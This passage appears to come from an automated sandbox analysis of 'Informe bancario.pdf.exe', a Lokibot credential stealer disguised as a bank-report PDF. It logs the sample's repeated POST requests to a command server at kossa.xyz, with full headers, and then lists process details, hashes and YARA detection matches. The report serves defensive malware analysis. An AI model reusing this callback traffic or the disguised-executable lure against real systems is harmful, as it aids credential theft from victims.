                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GvokBvlFU7rHymLkT5aDrY0YFW9JOrqKdEQDAYp28XRPOV9nTidnZuNJsuZx2Ecpe%2BgluEOIUHEw87efs71zeLfR5jQPOg72GppPSuamirQio2LGHZU2xFJ7Yd4%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe69addd1cbbcb-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  44192.168.2.349882172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:56:19.809047937 CEST12641OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:56:20.189312935 CEST12642INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:56:20 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=49za7TeTSY%2BScp3L3mbuGYQSzA8lKA0u3%2ByMCtjhTcKDSwymE1%2FJodRsLTRHciEX8Kq0Ra9aNOm%2Ffy2I42Ob1ewYWyfNEryyYANBw%2BmQa%2BV%2F4yBU3%2BqCKwbOKrI%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe69bfdc4a4052-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  45192.168.2.349883104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:56:20.757704973 CEST12642OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:56:21.122421980 CEST12643INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:56:21 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QtFAq1al83O%2FV%2B92iHB%2Bvj41q9z52fvvYULnr9pnDvcrgcXCZbRd%2Fg8PwqQ5%2B7osAmwSr8ZWHiJJHImkp%2FDMHhxFGmlMluudAzgI7dcN3u2RlpiJ3WS3kpCUnMU%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe69c5cf035bdd-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  5192.168.2.349746172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:42.346945047 CEST1155OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:42.724734068 CEST1156INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:42 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A5YyEf0yuwnHwY6Ol0zSUHeAlII5yG%2BtbGShw%2FjBJg5diEWvZQfKwCUTDIJxxICscixc6esDrhJtzgAn7OPqg90dV5gKlSdKD%2FW1lVNU2OPU2c2jZDcVkVCMggc%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe675ebf0c073a-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  6192.168.2.349747172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:44.305986881 CEST1156OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:44.695508003 CEST1157INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:44 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vEgpr3LOSViFW7U4tH4ppo5INxAD%2BZ%2BN3%2B9UVagKYbUpMETFO48oULBbA5Kr9X056uTqcm%2FIwqhHqd4PEs2vhrZ3QbZ0ozxdU95eKTCIQP9hp9TaTmBW0Aq1vrM%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe676afa967686-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  7192.168.2.349749172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:47.375833988 CEST1170OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:47.760540009 CEST1189INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:47 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F4Nqrt%2F5hGOyJxDUSwRw%2BU5zDViLSlLSg6wN6Ng%2FzguYQrkaT0UJAvGfoYFQZVGyEo1S7j15L1Is6rYnPqlyrbhlgioaEvmmmIssIyRqN3JfPx8ufigGYDLb8aE%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe677e2a1e71e6-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  8192.168.2.349757172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:50.135453939 CEST1286OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:50.515275002 CEST1300INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:50 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5xx1f%2BZB0Bg5SOjVIWnyu0GmHyG%2FMUBT0%2BClXCf6KEUUmDyR9H%2B5JAFdWPy4E49JxTYPuBPHW9AXlJtc1VrtPim5jOrGLb2ysNW1ZTe9KdOAJZLg%2FJq0FsNYDNM%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe678f6e537519-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  9192.168.2.349762172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:52.263394117 CEST1323OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:52.635915995 CEST1324INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:52 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l8gl5ethGM613nbIJMkijjldEfcAImSZ1NC%2BMhhEPi8o59DvPMewQifZG5OunxAQsmWlHRTeAIKHni0o%2BThHW2lo09mMKEmROFUNb7SzQ9dbI6%2B8whjK%2B5OwLtQ%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe679cbdb876d2-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Click to jump to process

                                  Target ID:0
                                  Start time:17:54:11
                                  Start date:23/06/2022
                                  Path:C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Informe bancario.pdf.exe"
                                  Imagebase:0x4b0000
                                  File size:497664 bytes
                                  MD5 hash:603FE9A434DA79407213DB7D4B907789
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low

                                  Target ID:4
                                  Start time:17:54:23
                                  Start date:23/06/2022
                                  Path:C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  Imagebase:0x2b0000
                                  File size:497664 bytes
                                  MD5 hash:603FE9A434DA79407213DB7D4B907789
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low

                                  Target ID:5
                                  Start time:17:54:25
                                  Start date:23/06/2022
                                  Path:C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  Imagebase:0x6e0000
                                  File size:497664 bytes
                                  MD5 hash:603FE9A434DA79407213DB7D4B907789
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low

                                  No disassembly